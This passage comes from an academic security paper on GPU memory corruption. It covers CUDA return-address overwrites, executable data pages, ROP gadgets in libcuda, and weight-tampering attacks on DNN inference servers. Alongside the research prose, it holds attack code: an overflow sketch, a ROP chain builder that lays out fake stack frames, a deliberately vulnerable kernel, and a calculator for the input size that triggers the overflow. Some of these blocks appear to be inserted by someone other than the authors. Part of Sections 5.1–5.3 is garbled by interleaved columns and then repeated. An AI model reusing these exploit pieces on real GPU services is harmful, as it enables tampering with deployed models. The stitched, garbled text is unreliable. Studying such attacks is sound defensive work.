    STL [R1+0x40], R2 ;                RET.ABS.NODEC R20 0x0 ;

Figure 5: Assembly code when entering/leaving the device function; the 64B local array in the device function is stored in [R1] to [R1+0x3c].

4.2 Return Address Corruption

Return address corruption is a severe security threat as it allows an attacker to hijack a program's control flow, potentially leading to arbitrary code execution. On CPUs, an attacker can exploit a stack buffer overflow vulnerability to overwrite the return address on the stack. However, prior studies [38, 48] suggest that such exploitation is not feasible on GPUs: they claim that on GPUs the return address is stored in an undisclosed location in the device memory, rather than on the stack (local memory). We reexamine this claim in this section.

4.2.1 Stack Management

To understand the management of the return address on GPUs, we launch a simple CUDA kernel whose only task is to call a device function. The device function allocates a 64B local array and fills it with 0xdeadbeef. Figure 5 shows assembly code snippets of this device function, illustrating the stack management at the beginning and end of the function. When the function starts, certain registers that the function intends to modify are pushed to the stack to be later restored upon the function's completion. Conversely, after the function finishes, these registers are popped from the stack and restored. These code snippets provide two key insights into CUDA's stack management:

- The role of R1. In CUDA, R1 is a general-purpose register, not a special register [44]. However, the above code implies that R1 can be used as the stack pointer. In fact, by further examining common CUDA libraries such as libcudnn, we found that R1 is the only register that has been used as the stack pointer. Notably, NVIDIA's list of special registers does not contain any register for the stack pointer [44].

- Stack commands. Similar to the RISC-V architecture, NVIDIA GPUs do not have dedicated push/pop instructions. Instead, a push operation is achieved through a local memory write together with a decrement of the stack pointer. Conversely, a pop operation is achieved by a local memory read and an increment of the stack pointer.

Return address. In Figure 5, the return instruction (RET) uses R20 as an operand. This register is pushed to the stack upon entering the function, and retrieved right before the RET instruction. Intuitively, the value in R20 should be related to the return address. To validate this, we run the program in CUDA-GDB and we found that the value of R20.64 (i.e., R21||R20)⁴ is the same as the expected return address (which in our specific case is 0x7fffd6fad8e0). To better understand this, we extract the device memory (before RET is executed) and show the local memory section in Figure 6. We can see that the value of R20.64 is located in the local memory, near the local array (filled with 0xdeadbeef). This observation confirms that the return address, represented by R20.64, is stored together with the local variables on the stack, in contradiction to the conclusions of previous studies.

    4d612a00: ef be ad de ef be ad de ef be ad de ef be ad de
    *
    4d613200: ff 7f 00 00 ff 7f 00 00 ff 7f 00 00 ff 7f 00 00
    *
    4d613280: 00 00 a0 d7 00 00 a0 d7 00 00 a0 d7 00 00 a0 d7
    *
    4d613300: 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00
    *
    4d613380: 10 00 00 00 10 00 00 00 10 00 00 00 10 00 00 00
    *
    4d613400: 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00
    *
    4d613480: e0 d8 fa d6 e0 d8 fa d6 e0 d8 fa d6 e0 d8 fa d6
    *
    4d613500: ff 7f 00 00 ff 7f 00 00 ff 7f 00 00 ff 7f 00 00

Figure 6: Part of the local memory in the dumped device memory; the local array (the 0xdeadbeef rows) and R20.64 (i.e., R21||R20, the "e0 d8 fa d6" row) are highlighted; "*" means the data is the same as above.

⁴While not explicitly specified in the instruction, RET appears to always retrieve the return address from R20.64 rather than just R20.
We further perform an OOB operation on the local array to overwrite the return address, pointing it into another function in the program. As anticipated, when the function returns, it proceeds with the overwritten address, executing the code located there, rather than returning to the original caller address. Similar behavior occurs when we perform an OOB operation on global memory (or shared memory) to overwrite the return address (cf. Table 2).
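The fragment below sketches the shape of that experiment. It is not the authors' code, the function and parameter names are made up, and it only corrupts the saved return address in the cases where the compiler actually spills it to the stack (cf. Section 4.2.2 and Figure 5).

    /* A device function with a 64B local array and no bounds check. When the
       copy length exceeds the array, the extra words land on the stack slots
       shown in Figure 5, including the saved R20.64 (the return address). */
    __device__ __noinline__ void victim(const unsigned long long *payload, int words) {
        unsigned long long frame[8];              /* 64B local array               */
        for (int i = 0; i < words; i++)           /* words > 8 overflows the frame */
            frame[i] = payload[i];                /* eventually hits the saved return address */
    }                                             /* RET now uses the attacker's value */

    __global__ void caller(const unsigned long long *payload, int words) {
        victim(payload, words);                   /* control flow resumes at the planted address */
    }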
Takeaway 2: In CUDA, exploiting a buffer overflow vulnerability allows an attacker to modify the return address stored in the local memory (stack), and therefore redirect the control flow of the program.

4.2.2 Return Address on the Stack

In Section 4.2.1, we focus on the scenarios where the return address register (e.g., R20 in Figure 5) is pushed to the stack during the execution of the function. However, the NVCC compiler does not always opt for this approach. Rather than pushing the return address register to the stack, the compiler often avoids using that register throughout the function. It only chooses to push this register if it is challenging (or infeasible) to ensure that this register remains untouched in the function. Below are some scenarios where the return address register is pushed to the stack.

1. The device function is recursive.

2. The device function has a substantial number of local variables, resulting in insufficient registers (i.e., register spill-out).

4.3 Code Injection

Executing data pages. With the capability to overwrite the return address, the attacker can redirect the execution to a data page which they have filled with shellcode. Then, when the function returns, the execution is diverted to this malicious code, resulting in a code injection attack. Such attacks have already been mitigated on CPUs: for example, most CPU systems have the W^X policy implemented, which mandates that every memory page can be either writable or executable, but not simultaneously both. This prevents the shellcode from being directly executed. However, we found that this policy is not implemented on modern GPUs.

Our results show that by manipulating the return address, we can redirect the control flow to a global memory address and execute the data there (as code). We can also change the control flow to point to a local memory address and execute the data on the stack.⁵ These findings suggest that GPUs do not make the writable data pages non-executable. We also found that according to the page table format [2, 45] released by NVIDIA, there is not an "executable bit" (nor a "dirty bit") in the PTE. This implies that GPUs do not check whether an address is a legitimate code address before executing its content. Note that prior studies claim that executing a data buffer is infeasible on GPUs; they believe that this is either because the code and data addresses are separated, or because the data pages are not executable [38, 48]. We found that neither of these hypotheses is accurate.

⁵The control flow cannot be redirected to a shared memory address, meaning we cannot execute the data stored in shared memory as if it were code.

Modifying code pages. Given that data pages are executable, a natural question that arises is whether code pages are modifiable. In fact, prior work has already shown that it is possible to modify code pages on older GPUs. We further verify this on modern GPUs by examining the device memory before and after writing to a code page. Additionally, when inspecting the GPU page table format, we notice a "read-only bit" in the PTE. However, after analyzing the page table (extracted from the device memory), we found that this bit consistently remains unset, even for code pages.

Takeaway 3: NVIDIA GPUs do not differentiate between code and data pages.

4.4 CUDA ROP

Return address corruption can also lead to code reuse attacks, of which ROP is a primary example. ROP has proven to be highly effective on CPUs, with numerous ROP gadgets found in commonly used library code, such as libc. Here we study the feasibility of ROP on modern GPUs.

CUDA library code. Upon inspecting the content of the device memory during the execution of a CUDA program, we found that, besides the application-specific code, there is additional code loaded into the device memory. This additional code is the same for every CUDA program. We compare this code with the machine code of common CUDA libraries and found that this code is part of libcuda. NVIDIA describes libcuda as the CUDA driver API library, which handles tasks related to direct interaction with the GPU, such as memory management, error handling, and stream management. Functions within this library include (but are not limited to) printf, cuMemcpy, and cuMemFree. In addition, our experiments show that after redirecting the control flow of a CUDA program to an address within this driver API code, we can execute this code without triggering any errors.

CUDA ROP gadgets. We examine this driver API code and found 190 return instructions (RET). Out of these RET instructions, only 52 are accompanied by an instruction that pops the return address. This means there are only 52 possible ROP gadgets in this driver API code, consisting of 7 memory corruption gadgets and 45 others. Figure 7 shows two example gadgets: the first one writes data from a register to a memory address, while the second one reads data from a memory address and then writes it to another address.
    /** Store gadget **/
    ST.E.64 [R28.64], R4 ;
    BSYNC B7 ;
    LDL R0,  [R1] ;
    BMOV.32 B6, R27 ;
    LDL R20, [R1+0x18] ;
    LDL R21, [R1+0x1c] ;
    LDL R2,  [R1+0x4] ;
    LDL R16, [R1+0x8] ;
    LDL R17, [R1+0xc] ;
    LDL R18, [R1+0x10] ;
    LDL R19, [R1+0x14] ;
    LDL R22, [R1+0x20] ;
    LDL R23, [R1+0x24] ;
    LDL R24, [R1+0x28] ;
    LDL R25, [R1+0x2c] ;
    LDL R26, [R1+0x30] ;
    LDL R27, [R1+0x34] ;
    LDL R28, [R1+0x38] ;
    LDL R29, [R1+0x3c] ;
    IADD3 R1, R1, 0x40, RZ ;
    BMOV.32 B7, R0 ;
    RET.ABS.NODEC R20 0x0 ;

    /** Load-and-store gadget **/
    LD.E.STRONG.GPU R5, [R6.64+0x5c] ;
    LOP3.LUT R0, R0, 0xffff, RZ, 0xc0, !PT ;   /** Logic operation **/
    IADD3 R0, R0, 0x4, RZ ;
    IMAD R4, R5, 0x20000, R0 ;
    IMAD.MOV.U32 R5, RZ, RZ, RZ ;
    ST.E.64 [R28.64], R4 ;                     /** Store **/
    BSYNC B7 ;
    LDL R0,  [R1] ;
    BMOV.32 B6, R27 ;
    IMAD.MOV.U32 R4, RZ, RZ, R2 ;
    LDL R20, [R1+0x18] ;
    LDL R21, [R1+0x1c] ;
    LDL R2,  [R1+0x4] ;
    LDL R16, [R1+0x8] ;
    LDL R17, [R1+0xc] ;
    LDL R18, [R1+0x10] ;
    LDL R19, [R1+0x14] ;
    LDL R22, [R1+0x20] ;
    ...                                        /** Pop R23 to R29 **/
    IADD3 R1, R1, 0x40, RZ ;
    BMOV.32 B7, R0 ;
    RET.ABS.NODEC R20 0x0 ;

Figure 7: CUDA ROP gadgets.

Unfortunately, our analysis suggests that this CUDA gadget set is not Turing complete. However, later in Section 5 we show that even with these limited gadgets, the attacker can significantly reduce the performance of DNN-based applications on GPUs. In addition, using the memory corruption gadgets, we might be able to modify the CUDA code (which is not write-protected) to create a Turing-complete collection of gadgets, thus achieving arbitrary computation.

Note that it is difficult to find unintended ROP gadgets, since all the GPU instructions must be 8B aligned. In addition, including other common CUDA libraries, such as libcublas and libcudnn, does not really bring more ROP gadgets: these libraries are so optimized that the return address is almost never pushed to the stack; it is typically stored in a register instead.
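To illustrate how the store gadget in Figure 7 can be strung together, the host-side sketch below lays out 0x40-byte fake stack frames. The frame offsets follow the pops in the gadget, the gadget and exit addresses are assumed to be known (e.g., fixed when ASLR is ineffective), and the value that gets written stays uncontrolled because R4 is never popped, exactly as exploited in Section 5.3.2.

    #include <cstdint>
    #include <cstring>
    #include <vector>

    /* Builds the fake stack consumed by repeated returns into the store
       gadget. Each 0x40-byte frame supplies, at +0x18/+0x1c, the next return
       address (popped into R20/R21) and, at +0x38/+0x3c, the address used by
       the *following* store (popped into R28/R29). The address for the very
       first store is planted by the initial overflow. */
    std::vector<uint8_t> build_chain(uint64_t store_gadget_va, uint64_t exit_va,
                                     const std::vector<uint64_t> &targets) {
        std::vector<uint8_t> chain(0x40 * targets.size(), 0);
        for (size_t i = 0; i < targets.size(); i++) {
            uint8_t *frame = chain.data() + 0x40 * i;
            uint64_t next_ret = (i + 1 < targets.size()) ? store_gadget_va : exit_va;
            uint64_t next_tgt = (i + 1 < targets.size()) ? targets[i + 1] : 0;
            std::memcpy(frame + 0x18, &next_ret, 8);   /* -> R20/R21 */
            std::memcpy(frame + 0x38, &next_tgt, 8);   /* -> R28/R29 */
        }
        return chain;
    }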
Takeaway 4: ROP can be used to read or write the memory on NVIDIA GPUs.

Generality. In this section, we discuss and present the investigations using the platform specified at the beginning of this section. However, the conclusions drawn from these investigations, including the feasibility of memory corruption across memory spaces (cf. Table 2) and the potential for code injection and code reuse attacks, are applicable to other modern NVIDIA GPUs as well.⁶ We have verified these vulnerabilities on multiple NVIDIA GPUs spanning several recent architectures, including Volta, Turing, Ampere, and Ada Lovelace; we conduct experiments on these GPUs with various NVIDIA drivers ranging from version 470.63 (released in July 2021) to version 550.67 (released in March 2024), and multiple CUDA toolkits ranging from version 11.2 to version 12.4. The results consistently demonstrate that these vulnerabilities exist across all tested GPUs, regardless of the driver/CUDA version used. The complete list of the tested GPUs is provided in Appendix A.

⁶The specific details, such as the number of ROP gadgets, may vary slightly depending on the CUDA version.

5 Case Study: Corruption Attacks on DNN

In this section, we demonstrate how the GPU memory corruption vulnerabilities discussed in Section 4 can pose significant security risks for DNN-based applications, which are one of the most common GPU applications.

5.1 Threat Model

Victim. The victim is a DNN-based application running on a server equipped with a modern NVIDIA GPU. This application receives requests from remote users, processes these requests using a DNN model, and sends the responses back. We assume that some of the CUDA kernels involved in the process of DNN inference have memory corruption vulnerabilities (vulnerability examples will be discussed in Section 5.2). As a common practice, model parameters, such as weights, are loaded into the device memory during application initialization. To minimize response latency, these parameters persist in memory across user requests, rather than being reloaded for each new request or removed after processing a request.

Attacker. The attacker is a remote user who can send requests to the victim application. By crafting a malicious request (detailed in Section 5.2), the attacker is able to exploit a buffer overflow vulnerability in the GPU kernels used by the victim application. The primary goal of the attacker is to alter the model parameters, such as the weights, through this vulnerability. Consequently, the inferences for future requests from other users will be compromised. We assume that the attacker has knowledge of the layout of the victim's DNN
model weights.

    /** Device func for matrix-vector multiplication **/
    /** T: the input matrix **/
    /** V: the input vector **/
    /** R: the result vector **/
    /** m: the number of rows in T **/
    /** n: the number of columns in T **/
    __device__ void matvecmul(scalar_t *T, scalar_t *V,
                              scalar_t *R, int m, int n)
    {
        scalar_t arr_local[64];
        int ncols = n / (blockDim.y * blockNum);
        int col0 = blockIdx.y * blockDim.y + threadIdx.y;
        for (int k = 0; k < ncols; k += 1)
            arr_local[k] = R[col0 * ncols + k];
        ...
    }

Listing 5: The device function for matrix-vector multiplication with a buffer overflow vulnerability.

5.2 Application Setups

Under the aforementioned threat model, we choose four widely used vision models as potential victims for our evaluation: ResNet-18 [26], ResNet-50 [26], VGGNet [54], and Vision Transformer (ViT) [35].⁷ We implement these models with popular DNN frameworks in cloud environments, such as PyTorch [49].

⁷We also test the memory corruption attacks on several large language models (LLMs), which we obtain from Hugging Face [10]; the details can be found in Appendix E.

We host the DNN inference application (i.e., the victim application) in a virtual machine on a cloud system equipped with a server-grade GPU, which is different from the system used for the experiments in Section 4. We utilize NVIDIA's virtual GPU (vGPU) technology to virtualize the GPU [13]. This is a common configuration for DNN inference in cloud environments [7, 8]. The detailed specifications of this system can be found in Appendix D. Note that vGPU does not support CUDA ASLR; with vGPU, addresses are not randomized even when ASLR is activated. We keep CUDA ASLR activated in our configuration as it is the default setting; however, it has no effect. We discuss CUDA ASLR in non-virtualized environments later in Section 6.2.

Previous work [18] has suggested that modern DNN frameworks may be vulnerable to GPU buffer overflow issues, but has not disclosed any specific instances. Similarly, we have not identified any overflow vulnerabilities in these frameworks. However, the goal of this paper is not to uncover such vulnerabilities; we leave that task for future research. Instead, for the purpose of our evaluation, we intentionally introduce buffer overflow vulnerabilities into the DNN frameworks.

Buffer overflow vulnerability. We include a CUDA device function for matrix-vector multiplication (with an overflow vulnerability) in the victim application, as shown in Listing 5. Matrix-vector multiplication is important and commonly used in DNN inference. This code uses multiple CUDA threads for each row in the matrix to calculate the partial sums, and each thread transfers the necessary portion of the vector from global memory to its local memory prior to the calculation. We deliberately introduce a vulnerability in this kernel: it lacks proper checks to ensure that the size of the vector portion handled by each thread does not exceed the capacity of the thread's local array. Consequently, a stack overflow can occur when the vector size, which is controlled by the user (explained below), is larger than expected.

Triggering the buffer overflow vulnerability. In order to trigger the vulnerability in Listing 5, we assume that the size of the vector (n) is controlled by the users. An example of this situation occurs during the data preprocessing stage. Specifically, the size of the input data provided by the user may not always match the required input size of the DNN model. For example, a user might provide an image of size 512×1024 pixels, while the DNN model is designed to process images of only 256×512 pixels. To handle such discrepancies, a convolution layer might be used to preprocess the user input before feeding it into the DNN model. This convolution layer often employs matrix-vector multiplication for performance optimization [16]. In this preprocessing convolution layer, the dimensions of the matrix and vector (m and n) are determined by the size of the user input. This potentially allows a user to trigger the vulnerability in Listing 5, if the input size is significantly larger than the size expected by the DNN model.
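The arithmetic behind such a malicious request is simple; the sketch below computes the smallest vector length that overruns arr_local in Listing 5, under an assumed launch geometry (block_dim_y and block_num are placeholders for the victim's actual configuration).

    #include <cstdio>

    int main() {
        const int block_dim_y   = 32;   /* assumed victim launch configuration */
        const int block_num     = 8;
        const int arr_local_len = 64;   /* capacity of arr_local in Listing 5  */
        /* Listing 5 copies ncols = n / (blockDim.y * blockNum) elements per thread,
           so any n beyond this bound overflows the 64-entry local array. */
        int n_evil = (arr_local_len + 1) * block_dim_y * block_num;
        printf("a request with vector dimension n >= %d triggers the overflow\n", n_evil);
        return 0;
    }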
uation: ResNet-18 [26], ResNet-50 [26], VGGNet [54], and mization [16]. In this preprocessing convolution layer, the
Vision Transformer (ViT) [35].7 We implement these models dimensions of the matrix and vector (m and n) are determined
with popular DNN frameworks in cloud environments, such by the size of the user input. This potentially allows a user
as PyTorch [49]. to trigger the vulnerability in Listing 5, if the input size is
We host the DNN inference application (i.e., the victim significantly larger than the size expected by the DNN model.
application) in a virtual machine on a cloud system equipped
with a server-grade GPU, which is different from the system 5.3 Attack Methods and Results
used for the experiments in Section 4. We utilize NVIDIA’s
virtual GPU (vGPU) technology to virtualize the GPU [13]. In this section, we examine the two strategies that an attacker
This is a common configuration for DNN inference in cloud can employ to modify the weights: code injection and ROP
environments [7, 8]. The detailed specifications of this sys- attacks. We discuss the specific steps an attacker must take to
tem can be found in Appendix D. Note that vGPU does launch these attacks, as well as the resulting outcomes.
not support CUDA ASLR; with vGPU, addresses are not
randomized even when ASLR is activated. We keep CUDA 5.3.1 Code Injection Attack
ASLR activated in our configuration as it is the default set-
We implement the code injection attack as a controlled weight
ting. However, it has no effect. We discuss CUDA ASLR in
attack: the attacker has control over the data written to mem-
non-virtualized environments later in Section 6.2.
ory and can modify the weights to any desired value. Specifi-
Previous work [18] has suggested that modern DNN frame-
cally, the attacker prepares a data buffer with shellcode that
works may be vulnerable to GPU buffer overflow issues, but
writes specific values to given addresses, and uses a stack over-
has not disclosed any specific instances. Similarly, we have
flow vulnerability to redirect the control flow to this buffer
not identified any overflow vulnerabilities in these frame-
(cf. Listing 5). Details of the shellcode can be found in Ap-
works. However, the goal of this paper is not to uncover such
pendix C. There are three steps in the attack:
vulnerabilities; we leave that task for future research. Instead,
for the purpose of our evaluation, we intentionally introduce Step 1: The attacker prepares a data buffer whose size is
buffer overflow vulnerabilities into the DNN frameworks. large enough to trigger the buffer overflow error in
Buffer overflow vulnerability. We include a CUDA device the victim (cf. Listing 5) when this buffer is sent to
function for matrix-vector multiplication (with an overflow the victim for DNN inference.
vulnerability) in the victim application, as shown in Listing 5. Step 2: The attacker manipulates the data in the buffer to
Matrix-vector multiplication is important and commonly used achieve two critical objectives: 1) the local array of
in DNN inference. This code uses multiple CUDA threads each thread (arr_local in Listing 5) is filled with
for each row in the matrix to calculate the partial sums, and expected shellcode after this buffer is copied to the
7We also test the memory corruption attacks on several large language local memory; 2) the return address of each thread
models (LLMs) which we obtain from Hugging Face [10], the details can be is overwritten with the address of this local array
found in Appendix E. (where the shellcode resides), after the data copy.
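To make the overflow pattern concrete, the following self-contained sketch mirrors the shape of Listing 5. The array capacity ARR_SIZE, the function name, and the parameter list are illustrative assumptions of ours, not the exact code used in the evaluation:

// Minimal sketch of the vulnerable pattern (assumed names and sizes,
// not the exact Listing 5 code).
#define ARR_SIZE 64                               // capacity sized for the model's expected input

__device__ float vector_partial_sum(const float *R, int n, int blockNum) {
    float arr_local[ARR_SIZE];                    // thread-local (stack) buffer
    int ncols = n / (blockDim.y * blockNum);      // derived from the user-controlled n
    int col0  = blockIdx.y * blockDim.y + threadIdx.y;
    // If the user supplies a larger n than the model expects, ncols exceeds
    // ARR_SIZE and the writes below run past arr_local, corrupting the
    // thread's stack frame in local memory (including the saved return address).
    for (int k = 0; k < ncols; k += 1)
        arr_local[k] = R[col0 * ncols + k];
    float sum = 0.0f;
    for (int k = 0; k < ncols; k += 1)
        sum += arr_local[k];                      // partial sum over this thread's slice
    return sum;
}

Because the local array and the saved return address both live in the thread's stack frame, an oversized n walks the copy loop straight over the control data, which is exactly what the attacks in Section 5.3 exploit.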
5.3 Attack Methods and Results

In this section, we examine the two strategies that an attacker can employ to modify the weights: code injection and ROP attacks. We discuss the specific steps an attacker must take to launch these attacks, as well as the resulting outcomes.

5.3.1 Code Injection Attack

We implement the code injection attack as a controlled weight modification attack: the attacker has control over the data written to memory and can modify the weights to any desired value. Specifically, the attacker prepares a data buffer with shellcode that writes specific values to given addresses, and uses a stack overflow vulnerability to redirect the control flow to this buffer (cf. Listing 5). Details of the shellcode can be found in Appendix C. There are three steps in the attack:

Step 1: The attacker prepares a data buffer whose size is large enough to trigger the buffer overflow error in the victim (cf. Listing 5) when this buffer is sent to the victim for DNN inference.

Step 2: The attacker manipulates the data in the buffer to achieve two critical objectives: 1) the local array of each thread (arr_local in Listing 5) is filled with the expected shellcode after this buffer is copied to the local memory; 2) the return address of each thread is overwritten with the address of this local array (where the shellcode resides) after the data copy. These preparations are crucial to ensure that, when the buffer overflow is triggered, it leads to the expected code injection attack.

Step 3: The attacker initiates a DNN inference request using this data buffer as the input.

5.3.2 ROP Attack

We implement the ROP attack as an uncontrolled weight modification attack: the attacker repeatedly executes a single memory write gadget to modify the weights. The attacker controls the register providing the address used in the write operation, but does not control the register that supplies the data to be written. Details of the gadget are in Appendix B.

This ROP attack has the same three steps as the code injection attack introduced in Section 5.3.1. However, the objectives in the second step, preparing the data buffer, are slightly different. Specifically, the attacker needs to manipulate the data in the input buffer to ensure that, after the data copy, 1) the return address on the stack is overwritten with the address of the ROP gadget, and 2) certain registers, which will be used by the ROP gadget, receive the expected values when popped from the stack.

5.3.3 Address of the Malicious Code

In the aforementioned two types of attacks, in order to modify the DNN weights, the attacker needs to know the address of the malicious code (either the ROP gadgets or the shellcode). As explained in Section 5.2, CUDA ASLR has no effect when using vGPU, making this address predictable and stable across executions. As a result, it is rather straightforward for the attacker to determine the address of the shellcode/ROP gadgets. For example, once the attacker profiles the memory of one NVIDIA GPU and identifies the addresses of the ROP gadgets, it can launch ROP attacks on all NVIDIA GPUs of the same generation that use the same CUDA toolkit, since these gadgets are loaded at fixed addresses. We discuss the scenarios in which ASLR takes effect (in native environments without virtual machines) in Section 6.2.

5.3.4 Results

We test the accuracy of each model after modifying the weights in its first layer, using the attack methods in Section 5.3.1 and Section 5.3.2. Table 3 shows the accuracy results after modifying 10%, 20%, 50%, and 100% of the weights. In the code injection attack, where the attacker can specify the desired weight value, we choose a large value for each weight. This is because most weight values in DNN models are very small; using a large value is expected to substantially impact the model performance. As shown in the table, this approach significantly reduces the accuracy across all tested models. ResNet-18 and ViT are especially affected, with their accuracy nearly mirroring random guessing. In contrast, in the ROP attack, where the attacker does not have control over the modified weight value, the accuracy remains largely unaffected. This is because the ROP gadget used in the attack happens to change the weights to a small value, close to the original weight values, rather than a large one.

Table 3: The DNN inference accuracy with the weight modification attacks (only for weights in the first layer).

DNN model                 Clean acc.   Weight modification (controlled)      Weight modification (uncontrolled)
                                       10%      20%      50%      100%       10%      20%      50%      100%
ResNet-18 (CIFAR-10)      87.37%       10.00%   10.00%   10.00%   10.00%     87.14%   87.32%   81.65%   10.83%
VGG-19 (CIFAR-10)         83.56%       13.46%   13.46%   11.19%   9.66%      74.90%   62.77%   59.01%   10.00%
ResNet-50 (ImageNet-1K)   84.97%       58.21%   55.21%   54.75%   44.35%     84.93%   84.27%   80.64%   65.33%
ViT (ImageNet-1K)         93.64%       0.09%    0.08%    0.12%    0.09%      92.78%   90.56%   90.33%   88.54%

6 Discussion

6.1 BSYNC in CUDA ROP Gadgets

Usage of BSYNC. CUDA provides synchronization mechanisms at different levels. The BSYNC instruction is specifically used for intra-warp synchronization. Although threads in a warp are intended to execute the same instruction simultaneously, some scenarios, such as conditional branches, can lead to thread divergence. BSYNC and BSSY are used to manage such situations: BSSY signals the hardware to prepare for divergence and specifies the address for re-convergence [25]. BSYNC serves as the synchronization barrier: when a thread in the warp reaches BSYNC, it waits for the other threads in the warp.

We found that BSYNC and BSSY always appear together (in a pair) in CUDA binaries. However, this pairing might not be maintained in ROP gadgets. For example, the gadgets in Figure 7 contain only BSYNC but not BSSY. This means that the re-convergence address is not specified when BSYNC executes, which may cause an error. Interestingly, our analysis reveals that if the threads in a warp do not diverge, BSYNC does not influence the execution. Thus, as long as threads remain in sync when executing a ROP gadget, the gadget will function as expected without being affected by BSYNC. This is a feasible condition, especially for DNN-based applications, where thread divergence rarely occurs.
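As a rough illustration of where these instructions come from, the kernel below contains the kind of data-dependent branch that makes a warp diverge; for such code, the compiler typically brackets the divergent region with a BSSY/BSYNC pair. The kernel is our own minimal example, and the exact SASS emitted depends on the GPU architecture and compiler version:

// Minimal sketch: a data-dependent branch that can make threads of the same
// warp take different paths. The compiler typically emits BSSY (record the
// re-convergence address) before the branch and BSYNC where the paths merge;
// if all threads of a warp happen to take the same path, the barrier has no
// visible effect on execution, which is why the unpaired BSYNC in the ROP
// gadgets is harmless for non-divergent workloads.
__global__ void divergent_scale(const int *in, int *out, int n) {
    int i = blockIdx.x * blockDim.x + threadIdx.x;
    if (i >= n) return;
    if (in[i] & 1)                 // odd elements take one path...
        out[i] = in[i] * 3;
    else                           // ...even elements take the other
        out[i] = in[i] / 2;
    // re-convergence point: the warp executes in lock-step again from here
}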
6.2 CUDA ASLR

In non-virtualized environments, CUDA supports ASLR for both data and code. In addition, the activation of CUDA ASLR depends on the ASLR settings in the OS. If ASLR is enabled in the OS, CUDA ASLR is also enabled (by the GPU driver), reflecting a similar level of randomization (e.g., no, conservative, or full randomization [11]) as the one in the OS. Note that, as mentioned in Section 5.2, CUDA ASLR does not function in virtualized environments with the vGPU technology [13].

CUDA ASLR, when functioning, makes it more difficult for the attacker to obtain the address of the shellcode and thus can help mitigate code injection attacks. However, the attacker may be able to bypass CUDA ASLR through GPU side channels (e.g., [58]). In addition, we found that the CUDA driver API library mentioned in Section 4.4 is always loaded at a fixed address, even when full randomization is applied. Therefore, we cannot rely on CUDA ASLR to completely stop the attacker from exploiting the ROP gadgets in this library.

6.3 CUDA JOP

Similar to ROP, jump-oriented programming (JOP) [15] is also an advanced code reuse attack technique. Instead of chaining gadgets that end in a return, JOP makes use of gadgets that end in an indirect jump. These jumps use registers to determine the destination address. To chain the JOP gadgets we need a "dispatcher" (also called "dispatcher gadget"). Its role is to load the address of the next gadget into the appropriate register and then jump to it.

On NVIDIA GPUs, the indirect jump instruction is BRX (e.g., "BRX R3, 0xa0"). With this instruction, it is possible to form JOP on GPUs. As mentioned in Section 4.4, we did not find any ROP gadgets in common CUDA libraries such as libcudnn and libcublas. However, we found that some of these libraries do use BRX and therefore contain JOP gadgets. Unfortunately, after analyzing these gadgets, we found that they can only perform limited functionality. For example, the libcuda.so.470.63.01 library contains 156 JOP gadgets, but 151 of these are merely for shifting register values. Similar observations have been made with other common CUDA libraries, such as libcudnn_cnn_infer.so.8.2.2. However, we may combine the ROP and JOP gadgets to achieve more functionality. More details of this can be found in Appendix F.

6.4 Memory Errors in Real-World GPU Applications

Memory errors, especially buffer overflow errors, have been identified in existing GPU applications. First, a previous study [22] analyzed 175 commonly used GPU programs in 16 benchmark suites and found 13 buffer overflow errors in 7 of these programs; some of these errors are very similar to the one we assumed in the ML attacks. Second, buffer overflow errors have also been found in web browsers that utilize GPUs to accelerate rendering tasks. For example, in 2022, researchers discovered a buffer overflow error in Chrome that occurs during the data transfer between CPU and GPU memory [3]. This allows a remote attacker to escape the sandbox through a crafted HTML page. In addition, in 2023, it was demonstrated that buffer overflows can also occur within WebGL programs running on GPUs, causing the browser to crash [4].

Furthermore, previous studies on fuzzing ML frameworks (e.g., [18]) have identified significant bugs in their GPU kernels. These include computation bugs, which lead to inaccurate results, and crash bugs, which can cause the entire application to crash. However, these preliminary fuzzing studies have not yet revealed any exploitable memory errors in these frameworks, which we leave for future work. Note that given the similar programming model between CUDA and C/C++, we believe it is likely that exploitable memory bugs exist in these frameworks.

6.5 CUDA Heap Exploitation

CUDA supports dynamic memory allocation: buffers dynamically allocated in CUDA kernels (using the malloc() function) reside in the GPU's heap memory.8 The heap memory is persistent during the lifetime of a GPU process and is shared among the kernels in this process. NVIDIA has not released the specific memory allocator used in CUDA. However, our experimental results suggest that this allocator follows policies similar to those in CPU memory allocators (e.g., ptmalloc [14]). Consequently, CUDA programs may also be vulnerable to spatial/temporal heap exploits, similar to those found in CPU programs. However, the use of dynamic memory allocation on GPUs is generally discouraged due to its significant performance overhead [33]. After analyzing common CUDA applications and benchmarks, we did not find any scenario where dynamic buffer allocation is used. Thus, we believe that this issue is much less significant compared to overflows in memory that is statically allocated (local/global/shared memory).

8 Heap memory is different from global memory. Global memory buffers can only be allocated by the CPU code (prior to a kernel launch, cf. Section 2.3), while heap buffers can be allocated by the GPU code during the execution of a CUDA kernel.
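For readers who have not used it, device-side allocation looks as follows. The kernel body and sizes are our own minimal example (not code from the applications we analyzed); the only CUDA features it relies on are in-kernel malloc()/free() and cudaDeviceSetLimit():

#include <cuda_runtime.h>

// Minimal sketch of CUDA's in-kernel dynamic allocation: the buffer returned
// by malloc() lives in the GPU heap, persists for the lifetime of the process,
// and is visible to later kernels of the same process until free() is called.
__global__ void heap_demo(int n) {
    int *buf = (int *)malloc(n * sizeof(int));   // served by the device-heap allocator
    if (buf == nullptr) return;                  // the device heap is small and can run out
    for (int i = 0; i < n; i++)
        buf[i] = i;                              // an unchecked n here would be a heap overflow
    free(buf);
}

int main() {
    // The default device heap is only a few megabytes; raise it before launching.
    cudaDeviceSetLimit(cudaLimitMallocHeapSize, 8u << 20);
    heap_demo<<<1, 1>>>(1024);
    cudaDeviceSynchronize();
    return 0;
}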
6.6 Countermeasures

OOB detection tools. There have been many tools to statically or dynamically detect buffer overflow errors in GPU programs. First, NVIDIA Compute Sanitizer [40], a tool for GPU memory safety checks, is based on dynamic binary instrumentation: it intercepts every program instruction at runtime before the execution. While effective, this approach introduces considerable performance overhead. Second, cuCatch [57] is a compile-time tool that can help detect both spatial and temporal memory errors during the execution of a CUDA program. It stores the necessary metadata for memory safety checks in a table, with one entry for each allocation. Given a pointer, the corresponding table entry index can be either embedded in the upper bits of the pointer (if possible), or stored in the shadow memory. cuCatch introduces much less performance overhead compared to NVIDIA Compute Sanitizer. However, it is important to note that neither of these tools can achieve a 100% detection rate.

